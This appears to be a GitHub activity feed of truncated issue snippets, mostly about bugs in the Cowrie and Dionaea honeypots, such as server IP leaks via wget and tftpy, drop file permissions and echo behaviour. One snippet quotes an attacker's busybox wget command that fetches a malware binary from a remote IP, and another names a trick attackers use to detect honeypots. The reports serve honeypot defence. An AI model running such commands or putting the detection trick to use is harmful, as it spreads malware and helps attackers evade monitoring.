fe7ch
Basically, there are just a couple of lines of code:
1. Forward the input parameter from TftpClient to TftpContext
2. After creating a socket in TftpContext, bind it to the passed address
I'm writing an IDAPython script that does some patching with the code. While running, the keypatch sometimes fails on code like this: ``` mov [rsp-28h+var_s20], rbp ``` That translates...
wget command leaks real cowrie server IP if a redirect is found (?). An attacker executed the following command: ``` /bin/busybox wget http://206.189.179.28:80/bins/sora.arm7 -O - > 19ju3d; /bin/busybox chmod 777...
The tftpy library used for handling of the tftp command leaks the real cowrie server IP. I've created an issue for tftpy (https://github.com/msoulier/tftpy/issues/88) to allow specifying an interface to bind to. When it will...
Drops for most download/upload events are created with a call `open('filename', 'wb')` that results in a file being created with permissions that reflect the umask parameter specified in bin/cowrie. However, files...
Currently, if you invoke `echo -ne 'asd' || echo -ne 'dsa'` on a cowrie box, you'll see "asddsa". A real system produces only "asd". This trick is used in the wild for honeypot...
##### ISSUE TYPE - Bug Report ##### DIONAEA VERSION ``` Clonned from master ``` ##### CONFIGURATION ``` - name: smb config: ## Generic setting ## # 1:"Windows XP Service Pack...
I've noticed that sometimes an attacker is only executing some commands instead of dropping a binary directly. The commands usually include a wget/curl call, so it would be nice to parse the command...